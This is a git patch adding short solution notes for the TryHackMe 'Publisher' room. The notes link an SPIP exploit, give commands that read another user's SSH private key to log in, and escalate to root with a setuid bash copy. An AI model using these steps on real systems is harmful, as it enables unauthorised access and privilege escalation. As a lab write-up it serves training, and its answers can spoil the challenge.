From 9cc9b937620a49699cf408f09906e64dec43aa73 Mon Sep 17 00:00:00 2001
From: 54toshi <julianeterribla@protonmail.com>
Date: Wed, 5 Feb 2025 00:41:36 +0100
Subject: [PATCH] thm publisher

---
 THM/publisher.md | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 THM/publisher.md

diff --git a/THM/publisher.md b/THM/publisher.md
new file mode 100644
index 0000000..c3dd6b3
--- /dev/null
+++ b/THM/publisher.md
@@ -0,0 +1,39 @@
+
+# Publisher
+https://tryhackme.com/room/publisher
+
+## solution
+### foothold
+exploit an SPIP vulnerability - https://github.com/nuts7/CVE-2023-27372
+
+### user
+```sh
+cat /home/think/.ssh/id_rsa
+```
+```sh
+echo '<privatekey>' > id_rsa
+chmod 600 id_rsa
+ssh-keygen -y -f think_id_rsa > think_id_rsa.pub
+ssh -i id_rsa think@ip
+cat /home/think/user.txt
+```
+
+### root
+```sh
+cd /dev/shm
+cp /bin/bash .
+./bash -p
+```
+
+/opt/run_container.sh
+```
+#!/bin/bash
+
+cp /bin/bash /tmp/default
+chmod +s /tmp/default
+```
+
+```
+./tmp/default -p
+cat /root/root.txt
+```